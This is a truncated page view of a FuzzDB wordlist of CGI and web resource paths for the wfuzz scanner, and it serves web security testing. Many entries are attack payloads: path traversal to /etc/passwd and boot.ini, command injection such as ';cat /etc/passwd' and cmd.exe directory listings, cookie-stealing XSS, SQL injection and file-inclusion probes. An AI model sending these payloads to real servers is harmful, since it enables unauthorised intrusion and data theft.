CGI_XPlatform.fuzz.txt

/wordlist/fuzzdb/Discovery/PredictableRes/CGI_XPlatform.fuzz.txt

http://wfuzz.googlecode.com/ · Plain Text · 3948 lines · 3948 code · 0 blank · 0 comment · 0 complexity · 798e9ede0fc7d946a97adde084bdf26f MD5 · raw file
Large files are truncated click here to view the full file

# fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi
14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
14all.cgi?cfg=../../../../../../../../etc/passwd
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
852566C90012664F
</etc/passwd>
<script>alert('Vulnerable')</script>
<script>alert('Vulnerable')</script>.aspx
<script>alert('Vulnerable')</script>.jsp
<script>alert('Vulnerable')</script>.shtm
<script>alert('Vulnerable')</script>.shtml
<script>alert('Vulnerable')</script>.stm
<script>alert('Vulnerable')</script>.thtml
?D=A
?M=A
?N=D
?Open
?OpenServer
?PageServices
?S=A
?\"><script>alert('Vulnerable');</script>
?mod=<script>alert(document.cookie)</script>&op=browse
?mod=node&nid=some_thing&op=view
?mod=some_thing&op=browse
?pattern=/etc/*&sort=name
?sql_debug=1
?wp-cs-dump
ADMINconfig.php
ASP/cart/database/metacart.mdb
AT-admin.cgi
AT-generate.cgi
Admin/
Admin_files/
Admin_files/order.log
Administration/
Agent/
Agentes/
Agents/
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AnyBoard.cgi
AnyForm
AnyForm2
Asp/
BACLIENT
Backup/add-passwd.cgi
C
CFIDE/administrator/index.cfm
CFIDE/probe.cfm
COM
CSMailto.cgi
CSMailto/CSMailto.cgi
CSNews.cgi
CVS/Entries
Cgitest.exe
Citrix/ICAWEB/
Citrix/MetaFrameXP/default/login.asp
Citrix/PNAgent/
Config1.htm
Count.cgi
DB4Web/10.10.10.10:100
DC
DCFORM
DCFORMS98.CGI
DCShop/auth_data/auth_user_file.txt
DCShop/orders/orders.txt
DEASAppDesign.nsf
DEASLog.nsf
DEASLog01.nsf
DEASLog02.nsf
DEASLog03.nsf
DEASLog04.nsf
DEASLog05.nsf
DEESAdmin.nsf
DMR/
Data/settings.xml+
DomainFiles/*//../../../../../../../../../../etc/passwd
EXE/
Excel/
File
FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek.cgi?head=&foot=;cat%20/etc/passwd
FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
FormMail.cgi?<script>alert(\
FormMail.pl
GW5/GWWEB.EXE
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
Gozila.cgi
HyperStat/stat_what.log
IBMWebAS/
IBMWebAS/apidocs/
IBMWebAS/configDocs/
IBMWebAS/docs/
IBMWebAS/mbeanDocs/
IDSWebApp/IDSjsp/Login.jsp
ISSamples/SQLQHit.asp
ISSamples/sqlqhit.asp
IlohaMail/blank.html
ImageFolio/admin/admin.cgi
JUNK(10)
JUNK(10)abcd.html
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
JUNK(223)<font%20size=50>DEFACED<!--//--
JUNK(5).csp
JUNK(5).htw
JUNK(5).xml
JUNK(5)/
JUNK(6).cfm?mode=debug
LOGIN.PWD
LWGate
LWGate.cgi
LiveHelp/
MIDICART/midicart.mdb
MSword/
MWS/HandleSearch.html?searchTarget=test&B1=Submit
Mem/dynaform/FileExplorer.htm
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
MsmMask.exe
MsmMask.exe?mask=/junk334
Msword/
NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
NULL.printer
NetDetector/middle_help_intro.htm
NetDynamic/
NetDynamics/
OA_HTML/
OA_HTML/META-INF/
OA_HTML/PTB/ECXOTAPing.htm
OA_HTML/PTB/ICXINDEXBASECASE.htm
OA_HTML/PTB/mwa_readme.htm
OA_HTML/PTB/xml_sample1.htm
OA_HTML/_pages/
OA_HTML/jsp/
OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
OA_HTML/jsp/fnd/fndhelputil.jsp
OA_HTML/jsp/fnd/fndversion.jsp
OA_HTML/jsp/por/services/login.jsp
OA_HTML/jsp/wf/WFReassign.jsp
OA_HTML/oam/
OA_HTML/oam/weboam.log
OA_HTML/webtools/doc/index.html
OA_JAVA/
OA_JAVA/Oracle/
OA_JAVA/oracle/forms/registry/Registry.dat
OA_JAVA/servlet.zip
OA_MEDIA/
OpenFile.aspx?file=../../../../../../../../../../boot.ini
OpenTopic
Orders/order_log.dat
Orders/order_log_v12.dat
PDG_Cart/
PDG_Cart/oder.log
PDG_Cart/shopper.conf
PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
POSTNUKEMy_eGallery/public/displayCategory.php
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
Pages/
Pbcgi.exe
ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
Program%20Files/
README
README.TXT
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
SGB_DIR/superguestconfig
SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
SQLQHit.asp
SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
SUNWmc/htdocs/
SUNWmc/htdocs/en_US/
Search
SetSecurity.shm
SilverStream
SilverStream/Meta/Tables/?access-mode=text
Site/biztalkhttpreceive.dll
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
SiteScope/htdocs/SiteScope.html
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/Admin/commerce/foundation/domain.asp
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
SiteServer/Admin/knowledge/persmbr/vs.asp
SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
SiteServer/Publishing/ViewCode.asp
SiteServer/admin/
SiteServer/admin/findvserver.asp
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
Sources/
Statistics/
Stats/
StoreDB/
Survey/Survey.Htm
TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
USER/CONFIG.AP
Upload.pl
VBZooM/add-subject.php
Vs
VsSetCookie.exe?
W
WEB-INF./web.xml
WEB-INF/web.xml
WEBAGENT/CQMGSERV/CF-SINFO.TPF
WINDMAIL.EXE?%20-n%20c:\boot.ini%
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
WS_FTP.LOG
WS_FTP.ini
WebAdmin.dll?View=Logon
WebCacheDemo.html
WebShop/
WebShop/logs/cc.txt
WebShop/templates/cc.txt
WebSphereSamples
WebTrend/
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
Web_store/
Webnews.exe
XMBforum/buddy.php
XMBforum/member.php
XSQLConfig.xml
Xcelerate/LoginPage.html
YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc
YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
[SecCheck]/..%252f..%252f../ext.ini
[SecCheck]/..%255c..%255c../ext.ini
[SecCheck]/..%2f../ext.ini
\"><img%20src=\"javascript:alert(document.domain)\">
_cti_pvt/
_head.php
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
_mem_bin/
_mem_bin/FormsLogin.asp
_mem_bin/auoconfig.asp
_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
_mem_bin/remind.asp
_pages
_pages/_demo/
_pages/_demo/_sql/
_pages/_webapp/_admin/_showjavartdetails.java
_pages/_webapp/_admin/_showpooldetails.java
_pages/_webapp/_jsp/
_private/
_private/_vti_cnf/
_private/form_results.htm
_private/form_results.html
_private/form_results.txt
_private/orders.htm
_private/orders.txt
_private/register.htm
_private/register.txt
_private/registrations.htm
_private/registrations.txt
_vti_bin/
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/CGImail.exe
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_vti_bin/_vti_cnf/
_vti_bin/admin.pl
_vti_bin/cfgwiz.exe
_vti_bin/contents.htm
_vti_bin/fpadmin.htm
_vti_bin/fpcount.exe
_vti_bin/fpcount.exe/
_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
_vti_bin/fpremadm.exe
_vti_bin/fpsrvadm.exe
_vti_bin/shtml.dll/_vti_rpc
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/_vti_rpc
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/junk_nonexistant.exe
_vti_cnf/_vti_cnf/
_vti_inf.html
_vti_log/_vti_cnf/
_vti_pvt/access.cnf
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/botinfs.cnf
_vti_pvt/bots.cnf
_vti_pvt/deptodoc.btr
_vti_pvt/doctodep.btr
_vti_pvt/linkinfo.cnf
_vti_pvt/service.cnf
_vti_pvt/service.pwd
_vti_pvt/services.cnf
_vti_pvt/services.org
_vti_pvt/svacl.cnf
_vti_pvt/users.pwd
_vti_pvt/writeto.cnf
_vti_txt/
_vti_txt/_vti_cnf/
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a1disp3.cgi?../../../../../../../../../../etc
a1disp3.cgi?../../../../../../../../../../etc/passwd
a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
a1stats/a1disp3.cgi?../../../../../../../../../../passwd
a1stats/a1disp3.cgi?../../../../../../../etc/passwd
a1stats/a1disp4.cgi?../../../../../../../etc/passwd
a?<script>alert('Vulnerable')</script>
a_domlog.nsf
a_security.htm
ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
ab2/\@AdminViewError
abonnement.asp
acart2_0/acart2_0.mdb
acart2_0/admin/category.asp
acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
acart2_0/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
acartpath/signin.asp?|-|0|404_Object_Not_Found
acceso/
access-log
access.log
access/
access_log
acciones/
account.nsf
account/
accounting/
accounts.nsf
accounts/getuserdesc.asp
achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
active.log
activex/
add.php
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
add_acl
add_ftp.cgi
add_user.php
addbanner.cgi
addressbook.php?\"><script>alert(Vulnerable)</script><!--
addressbook/index.php?name=<script>alert('Vulnerable')</script>
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
adduser.cgi
addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
adm/
admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
admcgi/contents.htm
admcgi/scripts/Fpadmcgi.exe
admentor/adminadmin.asp
admin-serv/config/admpw
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
admin.cgi
admin.cgi?list=../../../../../../../../../../etc
admin.cgi?list=../../../../../../../../../../etc/passwd
admin.htm
admin.html
admin.nsf
admin.php
admin.php3
admin.php4?reg_login=1
admin.php?en_log_id=0&action=config
admin.php?en_log_id=0&action=users
admin.pl
admin.shtml
admin/
admin/admin.php?adminpy=1
admin/admin.shtml
admin/admin_phpinfo.php4
admin/adminproc.asp
admin/aindex.htm
admin/auth.php
admin/browse.asp?FilePath=c:\&Opt=2&level=0
admin/cfg/configscreen.inc.php+
admin/cfg/configsite.inc.php+
admin/cfg/configsql.inc.php+
admin/cfg/configtache.inc.php+
admin/cms/htmltags.php
admin/contextAdmin/contextAdmin.html
admin/cplogfile.log
admin/credit_card_info.php
admin/database/wwForum.mdb
admin/datasource.asp
admin/db.php
admin/db.php?dump_sql=1
admin/exec.php3
admin/exec.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=dir%20c:\
admin/index.php
admin/login.php?action=insert&username=test&password=test
admin/login.php?path=\"></form><form
admin/modules/cache.php+
admin/objects.inc.php4
admin/phpinfo.php
admin/script.php
admin/settings.inc.php+
admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
admin/system.php3?cmd=cat%20/etc/passwd
admin/system.php3?cmd=dir%20c:\
admin/system_footer.php
admin/templates/header.php
admin/upload.php
admin/wg_user-info.ml
admin4.nsf
admin5.nsf
admin_t/include/aff_liste_langue.php
adminhot.cgi
administration/
administrator/
administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/uploadimage.php
administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
adminwww.cgi
admisapi/fpadmin.htm
adovbs.inc
adsamples/config/site.csc
adv/gm001-mc/
advwebadmin/
advworks/equipment/catalog_type.asp
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
aff_news.php
affich.php?image=<script>alert(document.cookie)</script>
agentadmin.php
agentes/
agentrunner.nsf
aglimpse
aglimpse.cgi
akopia/
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
alog.nsf
amadmin.pl
ammerum/
anacondaclip.pl?template=../../../../../../../../../../etc
anacondaclip.pl?template=../../../../../../../../../../etc/passwd
analog/
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
anthill/login.php
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
anyboard.cgi
apache/
apex/
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
aplogon.html
app/
appdet.html
applicattion/
applicattions/
applist.asp
approval/ts_app.htm
apps/
apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
archie
architext_query.cgi
architext_query.pl
archivar/
archive.asp
archive/
archive/a_domlog.nsf
archive/l_domlog.nsf
archive_forum.asp
archives/
archivo/
ariadne/
article.cfm?id=1'<script>alert(document.cookie);</script>
article.php?article=4965&post=1111111111
article.php?sid=\"><Img
ash
ashnews.php
asp/
asp/SQLQHit.asp
asp/sqlqhit.asp
astrocam.cgi
atc/
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
athenareg.php?pass=%20;cat%20/etc/passwd
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
auction/auction.cgi?action=
auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
auctiondeluxe/auction.pl
auktion.cgi?menue=../../../../../../../../../../etc
auktion.cgi?menue=../../../../../../../../../../etc/passwd
auth.inc.php
auth/
auth_data/auth_user_file.txt
author.asp
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
autologon.html?10514
awebvisit.stat
awl/auctionweaver.pl
awstats.pl
awstats/awstats.pl
ax-admin.cgi
ax.cgi
axis-cgi/buffer/command.cgi
axs.cgi
ayuda/
b2-include/b2edit.showposts.php
b2-tools/gm-2-b2.php
ba4.nsf
backdoor/
backup/
badmin.cgi
bak/
ban.bak
ban.dat
ban.log
banca/
banco/
bandwidth/index.cgi
bank/
banmat.pwd
banner.cgi
bannereditor.cgi
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
bash
basilix.php3
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
basilix/
basilix/compose-attach.php3
basilix/mbox-list.php3
basilix/message-read.php3
bb-ack.sh
bb-dnbd/faxsurvey
bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
bb-hist?HI
bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
bb-histlog.sh
bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
bb-rep.sh
bb-replog.sh
bb000001.pl<script>alert('Vulnerable')</script>
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbs_forum.cgi
bbv/
bc4j.html
bdata/
bdatos/
beta/
betsie/parserl.pl/<script>alert('Vulnerable')</script>;
betsie/parserl.pl/<script>alert('XSS')</script>;
bigconf.cgi
bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
bigsam_guestbook.php?displayBegin=9999...9999
billing.nsf
billing/billing.apw
bin/
bin/CGImail.exe
bin/admin.pl
bin/cfgwiz.exe
bin/common/user_update_passwd.pl
bin/contents.htm
bin/fpadmin.htm
bin/fpremadm.exe
bin/fpsrvadm.exe
bizdb1-search.cgi
biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
blah-whatever-badfile.jsp
blah-whatever.jsp
blah123.php
blah_badfile.shtml
blahb.ida
blahb.idq
blog/
blog/mt-check.cgi
blog/mt-load.cgi
blog/mt.cfg
bmp/
bmp/JSPClient.java
bmp/README.txt
bmp/global-web-application.xml
bmp/mime.types
bmp/setconn.jsp
bmp/sqljdemo.jsp
bnbform
bnbform.cgi
board/index.php
board/philboard_admin.asp+
boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
bookmark.nsf
books.nsf
boot/
boozt/admin/index.cgi?section=5&input=1
bottom.html
bsguest.cgi?email=x;ls
bslist.cgi?email=x;ls
buddies.blt
buddy.blt
buddylist.blt
bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
bugtest+/+
build.cgi
bulk/bulk.cgi
busytime.nsf
buy/
buynow/
bytehoard/index.php?infolder=../../../../../../../../../../../etc/
c/
c/winnt/system32/cmd.exe?/c+dir+/OG
c32web.exe/ChangeAdminPassword
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf 
c_download.cgi
ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
cache-stats/
cached_feed.cgi
cachemgr.cgi
caja/
cal_make.pl?p0=../../../../../../../../../../etc
cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
calendar
calendar.nsf
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
calendar.pl
calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
calendar/index.cgi
calendar_admin.pl?config=|cat%20/etc/passwd|
calender_admin.pl
campas?%0acat%0a/etc/passwd%0a
carbo.dll
card/
cards/
cart.pl
cart.pl?db='
cart/
cart32.exe
cartcart.cgi
cartmanager.cgi
cash/
catalog.nsf
catalog/includes/include_once.php
categorie.php3?cid=june
catinfo
catinfo?<u><b>TESTING
caupo/admin/admin_workspace.php
cbmc/forums.cgi
cbms/cbmsfoot.php
cbms/changepass.php
cbms/editclient.php
cbms/passgen.php
cbms/realinv.php
cbms/usersetup.php
ccard/
ccbill-local.cgi?cmd=MENU
ccbill-local.pl?cmd=MENU
ccbill/secure/ccbill.log
ccbill/whereami.cgi
cd-cgi/sscd_suncourier.pl
cd/
cdrom/
cehttp/property/
cehttp/trace
cersvr.nsf
cert/
certa.nsf
certificado/
certificate
certificates
certlog.nsf
certsrv.nsf
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
cfcache.map
cfdocs.map
cfdocs/cfcache.map
cfdocs/cfmlsyntaxcheck.cfm
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
cfdocs/exampleapp/email/application.cfm
cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
cfdocs/exampleapp/publish/admin/addcontent.cfm
cfdocs/exampleapp/publish/admin/application.cfm
cfdocs/examples/httpclient/mainframeset.cfm
cfdocs/expeval/displayopenedfile.cfm
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
cfdocs/expeval/openfile.cfm
cfdocs/expeval/sendmail.cfm
cfdocs/snippets/evaluate.cfm
cfdocs/snippets/fileexists.cfm
cfdocs/snippets/gettempdirectory.cfm
cfdocs/snippets/viewexample.cfm
cfgwiz.exe
cfide/Administrator/startstop.html
cfide/administrator/index.cfm
cgforum.cgi
cgi-bin-sdb/printenv
cgi-bin/
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
cgi-bin/%2e%2e/abyss.conf
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/.access
cgi-bin/.cobalt
cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
cgi-bin/.fhp
cgi-bin/.htaccess
cgi-bin/.htaccess.old
cgi-bin/.htaccess.save
cgi-bin/.htaccess~
cgi-bin/.htpasswd
cgi-bin/.nsconfig
cgi-bin/.passwd
cgi-bin/.www_acl
cgi-bin/.wwwacl
cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
cgi-bin//_vti_pvt/doctodep.btr
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/AT-admin.cgi
cgi-bin/AT-generate.cgi
cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
cgi-bin/AnyBoard.cgi
cgi-bin/AnyForm
cgi-bin/AnyForm2
cgi-bin/Backup/add-passwd.cgi
cgi-bin/CGImail.exe
cgi-bin/CSMailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/Cgitest.exe
cgi-bin/Count.cgi
cgi-bin/DCFORMS98.CGI
cgi-bin/DCShop/auth_data/auth_user_file.txt
cgi-bin/DCShop/orders/orders.txt
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
